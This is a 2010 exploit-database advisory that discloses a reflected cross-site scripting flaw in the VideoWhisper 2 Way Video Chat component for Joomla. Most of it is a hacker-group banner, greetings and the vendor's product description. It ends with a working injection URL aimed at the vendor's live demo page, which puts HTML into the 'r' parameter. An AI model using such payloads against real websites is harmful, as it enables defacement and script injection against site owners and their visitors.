======================================================
Joomla VideoWhisper 2 Way Video Chat XSS Vulnerability
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name :Joomla VideoWhisper 2 Way Video Chat XSS Vulnerability
Date : june, 10 2010
Vendor url :http://VideoWhisper.com
Tested on : Windows XP SP3
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
###############################################################################################################
Description:
VideoWhisper 2 Way Video Chat is a premium high definition video communication software designed for instant 1 on 1 online video conferencing. It's a solution for conducting easy to setup face to face meetings without leaving your office or home. It's the easiest and most cost-effective way to meet somebody and discuss one on one.
VideoWhisper 2 Way Video Chat component for Joomla provides an advanced interface for creating and managing 2 way video chat rooms.
VideoWhisper 2 Way Video Chat module for Joomla will list public rooms and rooms owned by current logged in user.
Rooms can be created, edited, deleted with multiple options, including resolution and framerate, bandwidh, usage limitations like credits that can be assigned for custom durations (daily, monthly).
This could be used for setting up paid services (offer 2 way video chat rooms to salesmen, sales companies, call centers).
###############################################################################################################
Xploit: XSS Vulnerability
DEMO URL http://www.videowhisper.com/demos/2wayvideochat/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E
###############################################################################################################
# 0day no more
# Sid3^effects